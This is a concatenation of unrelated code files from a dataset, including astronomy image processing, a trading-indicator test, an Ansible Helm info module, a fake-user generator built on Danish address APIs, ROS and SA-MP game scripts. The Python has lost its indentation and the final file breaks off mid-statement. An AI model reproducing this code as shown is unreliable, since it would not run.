iraf.noao(_doprint=0)
iraf.digiphot(_doprint=0)
iraf.apphot(_doprint=0)
os.chdir(fitsdir)
listfiles = glob.glob(myfilter)
listfiles.sort()
if (examine):
print ("Opening ",listfiles[0]," to examine.")
iraf.imexamine(input=listfiles[0], \
logfile="coords.dat", \
keeplog="yes")
with open("align.list",'w') as f:
for i in listfiles:
f.write(i+"\n")
print ("Aligning with reference:",listfiles[0])
iraf.imalign( input = "@align.list", referenc= listfiles[0], coords = "coords.dat", output = "a_@align.list")
listfiles = glob.glob("a_"+myfilter)
listfiles.sort()
with open("comb.list",'w') as f:
for i in listfiles:
f.write(i+"\n")
print ("Combining" )
iraf.imcombine(input = "@comb.list",\
output = "out.fits",\
combine= "median")
| StarcoderdataPython |
6458196 | # -*- coding: utf-8 -*-
import pydash as _
from config import settings
from . import redis_2_elasticsearch, kafka_2_elasticsearch
class Queue2ElasticsearchClient(object):
@property
def client(self):
return self.__client
def __init__(self, mode=None):
self.__switch = {
'redis': redis_2_elasticsearch.q2e,
'kafka': kafka_2_elasticsearch.q2e
}
self.__mode = mode or _.get(settings.SYNC, 'rts.mode', 'redis')
self.__client = _.get(self.__switch, self.__mode)
client = Queue2ElasticsearchClient().client
| StarcoderdataPython |
9781072 | from decimal import Decimal
import math
import numpy as np
import pandas as pd
import unittest
from hummingbot.strategy.__utils__.trailing_indicators.trading_intensity import TradingIntensityIndicator
class TradingIntensityTest(unittest.TestCase):
INITIAL_RANDOM_SEED = 3141592653
BUFFER_LENGTH = 200
def setUp(self) -> None:
np.random.seed(self.INITIAL_RANDOM_SEED)
@staticmethod
def make_order_books(original_price_mid, original_spread, original_amount, volatility, spread_stdev, amount_stdev, samples):
# 0.1% quantization of prices in the orderbook
PRICE_STEP_FRACTION = 0.001
# Generate BBO quotes
samples_mid = np.random.normal(original_price_mid, volatility * original_price_mid, samples)
samples_spread = np.random.normal(original_spread, spread_stdev, samples)
samples_price_bid = np.subtract(samples_mid, np.divide(samples_spread, 2))
samples_price_ask = np.add(samples_mid, np.divide(samples_spread, 2))
samples_amount_bid = np.random.normal(original_amount, amount_stdev, samples)
samples_amount_ask = np.random.normal(original_amount, amount_stdev, samples)
# A full orderbook is not necessary, only up to the BBO max deviation
price_depth_max = max(max(samples_price_bid) - min(samples_price_bid), max(samples_price_ask) - min(samples_price_ask))
bid_dfs = []
ask_dfs = []
# Generate an orderbook for every tick
for price_bid, amount_bid, price_ask, amount_ask in zip(samples_price_bid, samples_amount_bid, samples_price_ask, samples_amount_ask):
bid_df, ask_df = TradingIntensityTest.make_order_book(price_bid, amount_bid, price_ask, amount_ask, price_depth_max, original_price_mid * PRICE_STEP_FRACTION, amount_stdev)
bid_dfs += [bid_df]
ask_dfs += [ask_df]
return bid_dfs, ask_dfs
@staticmethod
def make_order_book(price_bid, amount_bid, price_ask, amount_ask, price_depth, price_step, amount_stdev, ):
prices_bid = np.linspace(price_bid, price_bid - price_depth, math.ceil(price_depth / price_step))
amounts_bid = np.random.normal(amount_bid, amount_stdev, len(prices_bid))
amounts_bid[0] = amount_bid
prices_ask = np.linspace(price_ask, price_ask + price_depth, math.ceil(price_depth / price_step))
amounts_ask = np.random.normal(amount_ask, amount_stdev, len(prices_ask))
amounts_ask[0] = amount_ask
data_bid = {'price': prices_bid, 'amount': amounts_bid}
bid_df = pd.DataFrame(data=data_bid)
data_ask = {'price': prices_ask, 'amount': amounts_ask}
ask_df = pd.DataFrame(data=data_ask)
return bid_df, ask_df
def test_calculate_trading_intensity(self):
N_SAMPLES = 1000
self.indicator = TradingIntensityIndicator(self.BUFFER_LENGTH)
original_price_mid = 100
original_spread = Decimal("10")
volatility = Decimal("5") / Decimal("100")
original_amount = Decimal("1")
spread_stdev = original_spread * Decimal("0.01")
amount_stdev = original_amount * Decimal("0.01")
# Generate orderbooks for all ticks
bids_df, asks_df = TradingIntensityTest.make_order_books(original_price_mid, original_spread, original_amount, volatility, spread_stdev, amount_stdev, N_SAMPLES)
for bid_df, ask_df in zip(bids_df, asks_df):
snapshot = (bid_df, ask_df)
self.indicator.add_sample(snapshot)
self.assertAlmostEqual(self.indicator.current_value[0], 1.0006118838992204, 4)
self.assertAlmostEqual(self.indicator.current_value[1], 0.00016076949224819458, 4)
| StarcoderdataPython |
9688786 | <reponame>jsonchin/nba_dfs_dashboard
from .player import player_profile_endpoint, player_logs_endpoint, player_averages_endpoint
from .game import game_endpoint, game_team_specific_endpoint
from .game_date_games import game_date_games_endpoint
from .file_upload import file_upload_draftkings
from .lineups import lineups_endpoint
| StarcoderdataPython |
61877 | <gh_stars>100-1000
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
"""This file is part of the django ERP project.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
__author__ = '<NAME> <<EMAIL>>'
__copyright__ = 'Copyright (c) 2013-2015, django ERP Team'
__version__ = '0.0.5'
from django.utils.translation import ugettext_noop as _
from djangoerp.menus.utils import get_bookmarks_for
from djangoerp.menus.models import Menu
from .loading import registry
from .forms import TextPluggetForm
def dummy(context):
return registry.default_func(context)
def menu(context):
"""Menu plugget.
Simply renders a menu.
"""
"""
It adds a context variables:
* name -- Slug of selected menu.
"""
pk = None
if "menu_id" in context:
# NOTE: Here, "context" is not a simple dict instance, so we can't use:
#
# >> pk = context.pop("menu_id", None)
#
pk = context.get('menu_id')
del context['menu_id']
if pk:
menu = Menu.objects.get(pk=pk)
context["name"] = menu.slug
return context
def bookmarks_menu(context):
"""Bookmarks plugget.
Shows all your bookmarks.
"""
if 'user' in context:
context['menu_id'] = get_bookmarks_for(context['user'].username).pk
return menu(context)
registry.register_simple_plugget_source(_("Text plugget"), _("Simply renders a text paragraph."), form=TextPluggetForm)
| StarcoderdataPython |
11274481 | from pymoo.algorithms.nsga2 import RankAndCrowdingSurvival
from pymoo.algorithms.so_de import DE
from pymoo.docs import parse_doc_string
from pymoo.model.population import Population
from pymoo.util.display import MultiObjectiveDisplay
from pymoo.util.dominator import get_relation
class GDE3(DE):
def __init__(self, **kwargs):
super().__init__(display=MultiObjectiveDisplay(), **kwargs)
def _next(self):
# make a step and create the offsprings
self.off = self.mating.do(self.problem, self.pop, self.n_offsprings, algorithm=self)
self.off.set("n_gen", self.n_gen)
# evaluate the offsprings
self.evaluator.eval(self.problem, self.off, algorithm=self)
survivors = []
for k in range(self.pop_size):
parent, off = self.pop[k], self.off[k]
rel = get_relation(parent, off)
if rel == 0:
survivors.extend([parent, off])
elif rel == -1:
survivors.append(off)
else:
survivors.append(parent)
survivors = Population.create(*survivors)
if len(survivors) > self.pop_size:
survivors = RankAndCrowdingSurvival().do(self.problem, survivors, self.pop_size)
self.pop = survivors
parse_doc_string(GDE3.__init__)
| StarcoderdataPython |
3528388 | #!/usr/bin/python
# -*- coding: utf-8 -*-
from bs4 import BeautifulSoup
import requests
import json
from time import time
import datetime
from loremipsum import *
import random
import math
import os
from .. import firebase_pushid
__location__ = os.path.realpath(
os.path.join(os.getcwd(), os.path.dirname(__file__)))
kortforsyningen_config = {}
with open(os.path.join(__location__, 'kortforsygningen.json'), 'rb+') as f:
kortforsyningen_config = json.load(f)
# use these instead of reading from disk all the time.
email_providers = []
first_names = {
"female": [],
"male": []
}
last_names = []
# DEPRECATED class
class User(object):
def __init__(self, data={}):
self.__dict__ = data
def valid(self):
return True
# helpers
# but can also be used as separate 'modules'
def randgender():
genders = ['male', 'female']
return genders[random.randint(0, len(genders)-1)]
# scope can be set to: small, medium, large, max
def randfn(scope, gender=None):
if scope not in ["small", "medium", "large", "max"]:
return None
global first_names
if gender is None:
gender = randgender()
if bool(first_names[gender]) is False:
# read
with open("../../danish-names/src/first-names/{gender}/{scope}.txt".format(gender=gender, scope=scope)) as f:
fns = f.read().split('\n')
first_names[gender] = fns
return fns[random.randint(0, len(fns)-1)]
fns = first_names[gender]
return fns[random.randint(0, len(fns)-1)]
def randln(scope):
if scope not in ["small", "medium", "large", "max"]:
return None
global last_names
if bool(last_names) is False:
with open("../../danish-names/src/last-names/{scope}.txt".format(scope=scope)) as f:
lns = f.read().split('\n')
last_names = lns
return lns[random.randint(0, len(lns)-1)]
return last_names[random.randint(0, len(last_names)-1)]
def randprovider():
global email_providers
if bool(email_providers) is False:
with open(os.path.join(__location__, 'free_email_provider_domains.txt'), 'rb+') as f:
providers = f.read().split('\n')
email_providers = providers
return email_providers[random.randint(0, len(email_providers)-1)]
return email_providers[random.randint(0, len(email_providers)-1)]
# https://english.stackexchange.com/questions/210483/birthdate-vs-birthday-i-know-three-other-people-who-share-my-birthdate
def randts(start, end):
ts = random.randint(start, end)
return ts
def randdate(start_ts=-688007541, end_ts=952987659, dateformat='%b %m, %Y'): # -688007541 = 1948 (70 years old) , 952987659 = 2000 (18 years old)
ts = randts(start_ts, end_ts)
return datetime.datetime.fromtimestamp(ts).strftime(dateformat)
# You can specify a gender
# if no gender specified, a random one will be given.
# NSN LENGTH: https://en.wikipedia.org/wiki/Telephone_numbers_in_Denmark
def randphone(country_code, length):
number = country_code
for i in range(4):
number += str(random.randint(0, 99)).zfill(2)
return number
def randpicture(gender=None):
if gender is None:
gender = randgender()
_type = "men"
if gender == "female":
_type = "women"
no = random.randint(0, 99)
return {
"large": "https://randomuser.me/api/portraits/{0}/{1}.jpg".format(_type, no),
"medium": "https://randomuser.me/api/portraits/med/{0}/{1}.jpg".format(_type, no),
"thumbnail": "https://randomuser.me/api/portraits/thumb/{0}/{1}.jpg".format(_type, no)
}
def closest_addrs(coord, hits):
addrs = []
url = "https://services.kortforsyningen.dk/"
# remove password and login you idiot!!
params = {
"login": kortforsyningen_config["login"],
"password": <PASSWORD>_config["password"],
"servicename": "RestGeokeys_v2",
"method": "nadresse",
"geop": "{lng}, {lat}".format(lng=coord[1], lat=coord[0]),
"hits": str(hits),
"geometry": "true",
"georef": "EPSG:4326"
}
headers = {
'Content-Type': 'application/json'
}
response = requests.request("GET", url, headers=headers, params=params)
data = response.json()
# right formatting.
# Klampenborgvej 88, 2800 Kongens Lyngby
for feature in data["features"]:
properties = feature["properties"]
# check for nullability
street = properties["vej_navn"].encode('utf-8')
no = properties["husnr"].encode('utf-8')
postcode = properties["postdistrikt_kode"].encode('utf-8')
city = properties["postdistrikt_navn"].encode('utf-8')
geometry = feature["geometry"]
coordinate = geometry["coordinates"] # note: the coordinate points are reversed
lat = coordinate[1]
lng = coordinate[0]
addrs.append({
"formattedAddress": "{street} {no}, {postcode} {city}".format(street = street, no = no, postcode = postcode, city = city),
"address": {
"street": street,
"no": no,
"postcode": postcode,
"city": city,
"countryName": "Denmark",
"countryCode": "DK",
"coordinate": {
"lat": lat,
"lng": lng
}
}
})
return addrs
def fetch_muni_details(name):
url = "https://services.kortforsyningen.dk/"
params = {
"login": kortforsyningen_config["login"],
"password": <PASSWORD>_config["password"],
"servicename" : "RestGeokeys_v2",
"method" : "kommune",
"komnavn" : "Kolding",
"geometry" : "true",
"georef" : "EPSG:4326"
}
headers = { 'Content-Type': 'Application/json' }
response = requests.request("GET", url, headers=headers, params=params)
return response.json()
def randmuni():
url = "http://dawa.aws.dk/kommuner/"
response = requests.request("GET", url)
munis = response.json()
muni = munis[random.randint(0, len(munis)-1)]
muni_name = muni["navn"]
return fetch_muni_details(muni_name)
# helper method for randpoint
# http://alienryderflex.com/polygon/
def inside(point, bbox):
# x1 < x < x2 and y1 < y < y2
return bbox[1] < point[0] < bbox[3] and bbox[0] < point[1] < bbox[2]
# Core logic taken from:
# https://gis.stackexchange.com/questions/163044/mapbox-how-to-generate-a-random-coordinate-inside-a-polygon
def randpoint(bbox):
sw = (bbox[1], bbox[0])
ne = (bbox[3], bbox[2])
x_min = sw[0]
x_max = ne[0]
y_min = ne[1]
y_max = sw[1]
lat = x_min + (random.random() * (x_max - x_min))
lng = y_min + (random.random() * (y_max - y_min))
point = (lat, lng)
if inside(point, bbox):
return point
else:
return randpoint(bbox)
def randaddr():
return None
def fake_user(gender=None):
if gender is None:
gender = randgender()
u = {}
u["id"] = firebase_pushid.PushID().next_id()
u["isEmployee"] = False
u["gender"] = gender
u["firstName"] = randfn("large", u["gender"])
u["lastName"] = randln("large")
u["fullName"] = u["firstName"] + " " + u["lastName"]
u["email"] = "{fn}.{ln}@{provider}".format(fn=u["firstName"].lower(), ln=u["lastName"].lower(), provider=randprovider())
u["phone"] = randphone("+45", 8)
u["birthdate"] = randdate()
u["picture"] = randpicture(u["gender"])
muni = randmuni()
bbox = muni["features"][0]["bbox"]
addr_resp = closest_addrs(randpoint(bbox), 1)
u["formattedAddress"] = addr_resp[0]["formattedAddress"]
u["address"] = addr_resp[0]["address"]
return u
| StarcoderdataPython |
6627798 | <gh_stars>0
# Copyright (C) 2016 <NAME>
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from neutronclient import shell
from neutronclient.tests.unit import test_cli20
TOKEN = test_cli20.TOKEN
class MyResp(test_cli20.MyResp):
pass
class MyApp(test_cli20.MyApp):
pass
class MyComparator(test_cli20.MyComparator):
pass
class CLIExtTestV20Base(test_cli20.CLITestV20Base):
def setUp(self, plurals=None):
super(CLIExtTestV20Base, self).setUp(plurals=plurals)
def _setup_mock_patch(self, name):
patcher = mock.patch(name)
thing = patcher.start()
return thing
def _mock_load_extensions(self, resource):
load_method = ('neutronclient.common.extension.' +
'_discover_via_entry_points')
load_ext_mock = self._setup_mock_patch(load_method)
load_ext_mock.return_value = [resource]
return load_ext_mock
def _test_update_ext_resource(self, resource, cmd, myid, args,
extrafields,
cmd_resource=None, parent_id=None):
if not cmd_resource:
cmd_resource = resource
body = {resource: extrafields}
path = getattr(self.client, cmd_resource + "_path")
if parent_id:
path = path % parent_id
path = path % myid
mock_body = MyComparator(body, self.client)
resp = (MyResp(204), None)
cmd_parser = cmd.get_parser("update_" + cmd_resource)
with mock.patch.object(cmd, 'get_client',
return_value=self.client)as mock_get_client, \
mock.patch.object(self.client.httpclient, 'request',
return_value=resp) as mock_request:
shell.run_command(cmd, cmd_parser, args)
self.assert_mock_multiple_calls_with_same_arguments(
mock_get_client, mock.call(), None)
mock_request.assert_called_once_with(
test_cli20.end_url(path),
'PUT',
body=mock_body,
headers=test_cli20.ContainsKeyValue({'X-Auth-Token': TOKEN}))
_str = self.fake_stdout.make_string()
self.assertIn(myid, _str)
def _test_show_ext_resource(self, resource, cmd, myid, args, fields=(),
cmd_resource=None, parent_id=None):
if not cmd_resource:
cmd_resource = resource
query = "&".join(["fields=%s" % field for field in fields])
expected_res = {resource:
{self.id_field: myid,
'name': 'myname', }, }
resstr = self.client.serialize(expected_res)
path = getattr(self.client, cmd_resource + "_path")
if parent_id:
path = path % parent_id
path = path % myid
cmd_parser = cmd.get_parser("show_" + cmd_resource)
resp = (MyResp(200), resstr)
with mock.patch.object(cmd, 'get_client',
return_value=self.client)as mock_get_client, \
mock.patch.object(self.client.httpclient, 'request',
return_value=resp) as mock_request:
shell.run_command(cmd, cmd_parser, args)
self.assert_mock_multiple_calls_with_same_arguments(
mock_get_client, mock.call(), None)
mock_request.assert_called_once_with(
test_cli20.end_url(path, query),
'GET',
body=None,
headers=test_cli20.ContainsKeyValue({'X-Auth-Token': TOKEN}))
_str = self.fake_stdout.make_string()
self.assertIn(myid, _str)
self.assertIn('myname', _str)
def _test_delete_ext_resource(self, resource, cmd, myid, args,
cmd_resource=None, parent_id=None):
if not cmd_resource:
cmd_resource = resource
path = getattr(self.client, cmd_resource + "_path")
if parent_id:
path = path % parent_id
path = path % myid
cmd_parser = cmd.get_parser("delete_" + cmd_resource)
resp = (MyResp(204), None)
with mock.patch.object(cmd, 'get_client',
return_value=self.client)as mock_get_client, \
mock.patch.object(self.client.httpclient, 'request',
return_value=resp) as mock_request:
shell.run_command(cmd, cmd_parser, args)
self.assert_mock_multiple_calls_with_same_arguments(
mock_get_client, mock.call(), None)
mock_request.assert_called_once_with(
test_cli20.end_url(path),
'DELETE',
body=None,
headers=test_cli20.ContainsKeyValue({'X-Auth-Token': TOKEN}))
_str = self.fake_stdout.make_string()
self.assertIn(myid, _str)
| StarcoderdataPython |
8170709 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2020, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = r'''
---
module: helm_info
short_description: Get information from Helm package deployed inside the cluster
version_added: "0.11.0"
author:
- <NAME> (@LucasBoisserie)
requirements:
- "helm (https://github.com/helm/helm/releases)"
- "yaml (https://pypi.org/project/PyYAML/)"
description:
- Get information (values, states, ...) from Helm package deployed inside the cluster.
options:
release_name:
description:
- Release name to manage.
required: true
type: str
aliases: [ name ]
release_namespace:
description:
- Kubernetes namespace where the chart should be installed.
required: true
type: str
aliases: [ namespace ]
extends_documentation_fragment:
- kubernetes.core.helm_common_options
'''
EXAMPLES = r'''
- name: Deploy latest version of Grafana chart inside monitoring namespace
kubernetes.core.helm_info:
name: test
release_namespace: monitoring
'''
RETURN = r'''
status:
type: complex
description: A dictionary of status output
returned: only when release exists
contains:
appversion:
type: str
returned: always
description: Version of app deployed
chart:
type: str
returned: always
description: Chart name and chart version
name:
type: str
returned: always
description: Name of the release
namespace:
type: str
returned: always
description: Namespace where the release is deployed
revision:
type: str
returned: always
description: Number of time where the release has been updated
status:
type: str
returned: always
description: Status of release (can be DEPLOYED, FAILED, ...)
updated:
type: str
returned: always
description: The Date of last update
values:
type: str
returned: always
description: Dict of Values used to deploy
'''
import traceback
try:
import yaml
IMP_YAML = True
except ImportError:
IMP_YAML_ERR = traceback.format_exc()
IMP_YAML = False
from ansible.module_utils.basic import AnsibleModule, missing_required_lib, env_fallback
module = None
# Get Values from deployed release
def get_values(command, release_name):
get_command = command + " get values --output=yaml " + release_name
rc, out, err = module.run_command(get_command)
if rc != 0:
module.fail_json(
msg="Failure when executing Helm command. Exited {0}.\nstdout: {1}\nstderr: {2}".format(rc, out, err),
command=get_command
)
# Helm 3 return "null" string when no values are set
if out.rstrip("\n") == "null":
return {}
else:
return yaml.safe_load(out)
# Get Release from all deployed releases
def get_release(state, release_name):
if state is not None:
for release in state:
if release['name'] == release_name:
return release
return None
# Get Release state from deployed release
def get_release_status(command, release_name):
list_command = command + " list --output=yaml --filter " + release_name
rc, out, err = module.run_command(list_command)
if rc != 0:
module.fail_json(
msg="Failure when executing Helm command. Exited {0}.\nstdout: {1}\nstderr: {2}".format(rc, out, err),
command=list_command
)
release = get_release(yaml.safe_load(out), release_name)
if release is None: # not install
return None
release['values'] = get_values(command, release_name)
return release
def main():
global module
module = AnsibleModule(
argument_spec=dict(
binary_path=dict(type='path'),
release_name=dict(type='str', required=True, aliases=['name']),
release_namespace=dict(type='str', required=True, aliases=['namespace']),
# Helm options
kube_context=dict(type='str', aliases=['context'], fallback=(env_fallback, ['K8S_AUTH_CONTEXT'])),
kubeconfig_path=dict(type='path', aliases=['kubeconfig'], fallback=(env_fallback, ['K8S_AUTH_KUBECONFIG'])),
),
supports_check_mode=True,
)
if not IMP_YAML:
module.fail_json(msg=missing_required_lib("yaml"), exception=IMP_YAML_ERR)
bin_path = module.params.get('binary_path')
release_name = module.params.get('release_name')
release_namespace = module.params.get('release_namespace')
# Helm options
kube_context = module.params.get('kube_context')
kubeconfig_path = module.params.get('kubeconfig_path')
if bin_path is not None:
helm_cmd_common = bin_path
else:
helm_cmd_common = module.get_bin_path('helm', required=True)
if kube_context is not None:
helm_cmd_common += " --kube-context " + kube_context
if kubeconfig_path is not None:
helm_cmd_common += " --kubeconfig " + kubeconfig_path
helm_cmd_common += " --namespace=" + release_namespace
release_status = get_release_status(helm_cmd_common, release_name)
if release_status is not None:
module.exit_json(changed=False, status=release_status)
module.exit_json(changed=False)
if __name__ == '__main__':
main()
| StarcoderdataPython |
8077561 | <reponame>meghanaravikumar/sigopt-examples
from distilbert_data_model_loaders.load_transfomer_model import LoadModel
import logging
class LoadPretrainedModel(LoadModel):
def __init__(self, model_type, model_name_or_path, cache_dir):
super().__init__(model_type)
self.model_name_or_path = model_name_or_path
self.cache_dir = cache_dir
def get_pretrained_model(self, config):
return self.model_class.from_pretrained(
self.model_name_or_path,
from_tf=bool(".ckpt" in self.model_name_or_path),
config=config,
cache_dir=self.cache_dir if self.cache_dir else None,
)
def get_pretrained_config(self, config_name=None):
return self.config_class.from_pretrained(
config_name if config_name else self.model_name_or_path,
cache_dir=self.cache_dir if self.cache_dir else None,
)
def get_tokenizer(self, max_positional_embedding_length, tokenizer_name=None, do_lower=True):
return self.tokenizer_class.from_pretrained(
tokenizer_name if tokenizer_name else self.model_name_or_path,
do_lower_case=do_lower,
cache_dir=self.cache_dir if self.cache_dir else None,
max_len=max_positional_embedding_length,
)
def get_pretrained_model(model_type, model_name_or_path, cache_dir):
logging.info("loading pretrained model with model type: {}, model name or path: {}, and cache_dir: {}"
.format(model_type, model_name_or_path, cache_dir))
pretrained_loader = LoadPretrainedModel(model_type=model_type,
model_name_or_path=model_name_or_path,
cache_dir=cache_dir)
pretrained_config = pretrained_loader.get_pretrained_config()
pretrained_model = pretrained_loader.get_pretrained_model(config=pretrained_config)
return pretrained_loader, pretrained_model, pretrained_config
def get_pretrained_tokenizer(model_type, model_name_or_path, cache_dir, max_positional_embedding_length=512):
logging.info("loading pretrained tokenizer with model type: {}, model name or path: {}, cache_dir: {}, and pos "
"embedding length: {}".format(model_type, model_name_or_path, cache_dir, max_positional_embedding_length))
pretrained_loader = LoadPretrainedModel(model_type=model_type,
model_name_or_path=model_name_or_path,
cache_dir=cache_dir)
pretrained_tokenizer = pretrained_loader.get_tokenizer(max_positional_embedding_length)
return pretrained_tokenizer
| StarcoderdataPython |
1981674 | <gh_stars>0
#!/usr/bin/env python
"""Example of a basic tractor behavior.
This module demonstrates an example behavior written in python to be
compatible with the state controller. The behavior publishes any
command received on /ex_topic directly to the corresponding topic
/state_controller/cmd_behavior.
authored by <NAME> on 2019-10-29
"""
import rospy
from geometry_msgs.msg import Twist
from state_controller.msg import TwistLabeled
class BehaviorEx():
def __init__(self):
"""Initialize node, publisher and subscriber."""
# In ROS, nodes are uniquely named. If two nodes with the same
# name are launched, the previous one is kicked off. The
# anonymous=True flag means that rospy will choose a unique
# name for our 'listener' node so that multiple listeners can
# run simultaneously.
rospy.init_node('behavior_ex', anonymous=True)
rospy.Subscriber('/ex_topic', Twist, self.callback)
self.twist_publisher = rospy.Publisher(
'/state_controller/cmd_behavior', TwistLabeled, queue_size=1)
# spin() simply keeps python from exiting until this node is stopped
rospy.spin()
def callback(self, data):
"""Forward recieved twist message to state controller with label."""
new_msg = TwistLabeled()
new_msg.twist = data
new_msg.label.data = 'example'
self.twist_publisher.publish(new_msg)
if __name__ == '__main__':
b = BehaviorEx()
| StarcoderdataPython |
1918781 | <reponame>Cheaterman/PySAMP<gh_stars>10-100
import random
from samp import *
from glspawns import *
from funcs import *
from vars import *
from player import *
################################
"""
Hello dear user!
Welcome to the Python version of the original Grand Larceny gamemode!
We wanted to convert this classic gamemode into what it would look like
in python, and here is the result. We took our liberty to nick it "PyLarc".
The intention behind converting it, was to give you all an idea of how the plugin works,
and to give you all a good example.
We have tried to show how player classes can be implemented (check player.py), and
also how the general usage works.
Everything here should function as in the original PAWN version, and if you
find any bugs, you can report them on our repo; https://github.com/habecker/PySAMP/issues
For now, enjoy the code, and good luck!
denNorske & Habecker
"""
################################
def OnGameModeInit():
SetGameModeText('PyLarc')
print("-----------------------------------------------")
print("Running Grand Larceny - by the SA-MP team\nRe-written to python 3.8.6 by the PySAMP Team")
print("-----------------------------------------------")
ShowPlayerMarkers(1) # PLAYER_MARKERS_MODE_GLOBAL = 1
ShowNameTags(True)
SetNameTagDrawDistance(40)
EnableStuntBonusForAll(False)
DisableInteriorEnterExits()
SetWeather(2)
#LimitGlobalChatRadius(300.0)
ClassSel_InitTextDraws()
# Player Class
AddPlayerClass(1,1759.0189,-1898.1260,13.5622,266.4503,-1,-1,-1,-1,-1,-1)
AddPlayerClass(2,1759.0189,-1898.1260,13.5622,266.4503,-1,-1,-1,-1,-1,-1)
AddPlayerClass(47,1759.0189,-1898.1260,13.5622,266.4503,-1,-1,-1,-1,-1,-1)
AddPlayerClass(48,1759.0189,-1898.1260,13.5622,266.4503,-1,-1,-1,-1,-1,-1)
AddPlayerClass(49,1759.0189,-1898.1260,13.5622,266.4503,-1,-1,-1,-1,-1,-1)
AddPlayerClass(50,1759.0189,-1898.1260,13.5622,266.4503,-1,-1,-1,-1,-1,-1)
AddPlayerClass(51,1759.0189,-1898.1260,13.5622,266.4503,-1,-1,-1,-1,-1,-1)
AddPlayerClass(52,1759.0189,-1898.1260,13.5622,266.4503,-1,-1,-1,-1,-1,-1)
AddPlayerClass(53,1759.0189,-1898.1260,13.5622,266.4503,-1,-1,-1,-1,-1,-1)
AddPlayerClass(54,1759.0189,-1898.1260,13.5622,266.4503,-1,-1,-1,-1,-1,-1)
AddPlayerClass(55,1759.0189,-1898.1260,13.5622,266.4503,-1,-1,-1,-1,-1,-1)
AddPlayerClass(56,1759.0189,-1898.1260,13.5622,266.4503,-1,-1,-1,-1,-1,-1)
AddPlayerClass(57,1759.0189,-1898.1260,13.5622,266.4503,-1,-1,-1,-1,-1,-1)
AddPlayerClass(58,1759.0189,-1898.1260,13.5622,266.4503,-1,-1,-1,-1,-1,-1)
AddPlayerClass(68,1759.0189,-1898.1260,13.5622,266.4503,-1,-1,-1,-1,-1,-1)
AddPlayerClass(69,1759.0189,-1898.1260,13.5622,266.4503,-1,-1,-1,-1,-1,-1)
AddPlayerClass(70,1759.0189,-1898.1260,13.5622,266.4503,-1,-1,-1,-1,-1,-1)
AddPlayerClass(71,1759.0189,-1898.1260,13.5622,266.4503,-1,-1,-1,-1,-1,-1)
AddPlayerClass(72,1759.0189,-1898.1260,13.5622,266.4503,-1,-1,-1,-1,-1,-1)
AddPlayerClass(73,1759.0189,-1898.1260,13.5622,266.4503,-1,-1,-1,-1,-1,-1)
AddPlayerClass(75,1759.0189,-1898.1260,13.5622,266.4503,-1,-1,-1,-1,-1,-1)
AddPlayerClass(76,1759.0189,-1898.1260,13.5622,266.4503,-1,-1,-1,-1,-1,-1)
AddPlayerClass(78,1759.0189,-1898.1260,13.5622,266.4503,-1,-1,-1,-1,-1,-1)
AddPlayerClass(79,1759.0189,-1898.1260,13.5622,266.4503,-1,-1,-1,-1,-1,-1)
AddPlayerClass(80,1759.0189,-1898.1260,13.5622,266.4503,-1,-1,-1,-1,-1,-1)
AddPlayerClass(81,1759.0189,-1898.1260,13.5622,266.4503,-1,-1,-1,-1,-1,-1)
AddPlayerClass(82,1759.0189,-1898.1260,13.5622,266.4503,-1,-1,-1,-1,-1,-1)
AddPlayerClass(83,1759.0189,-1898.1260,13.5622,266.4503,-1,-1,-1,-1,-1,-1)
AddPlayerClass(84,1759.0189,-1898.1260,13.5622,266.4503,-1,-1,-1,-1,-1,-1)
AddPlayerClass(85,1759.0189,-1898.1260,13.5622,266.4503,-1,-1,-1,-1,-1,-1)
AddPlayerClass(87,1759.0189,-1898.1260,13.5622,266.4503,-1,-1,-1,-1,-1,-1)
AddPlayerClass(88,1759.0189,-1898.1260,13.5622,266.4503,-1,-1,-1,-1,-1,-1)
AddPlayerClass(89,1759.0189,-1898.1260,13.5622,266.4503,-1,-1,-1,-1,-1,-1)
AddPlayerClass(91,1759.0189,-1898.1260,13.5622,266.4503,-1,-1,-1,-1,-1,-1)
AddPlayerClass(92,1759.0189,-1898.1260,13.5622,266.4503,-1,-1,-1,-1,-1,-1)
AddPlayerClass(93,1759.0189,-1898.1260,13.5622,266.4503,-1,-1,-1,-1,-1,-1)
AddPlayerClass(95,1759.0189,-1898.1260,13.5622,266.4503,-1,-1,-1,-1,-1,-1)
AddPlayerClass(96,1759.0189,-1898.1260,13.5622,266.4503,-1,-1,-1,-1,-1,-1)
AddPlayerClass(97,1759.0189,-1898.1260,13.5622,266.4503,-1,-1,-1,-1,-1,-1)
AddPlayerClass(98,1759.0189,-1898.1260,13.5622,266.4503,-1,-1,-1,-1,-1,-1)
AddPlayerClass(99,1759.0189,-1898.1260,13.5622,266.4503,-1,-1,-1,-1,-1,-1)
AddPlayerClass(269,1759.0189,-1898.1260,13.5622,266.4503,-1,-1,-1,-1,-1,-1)
AddPlayerClass(270,1759.0189,-1898.1260,13.5622,266.4503,-1,-1,-1,-1,-1,-1)
AddPlayerClass(271,1759.0189,-1898.1260,13.5622,266.4503,-1,-1,-1,-1,-1,-1)
AddPlayerClass(272,1759.0189,-1898.1260,13.5622,266.4503,-1,-1,-1,-1,-1,-1)
total_vehicles_from_files = (
# SPECIAL:
LoadStaticVehiclesFromFile("scriptfiles/vehicles/trains.txt") +
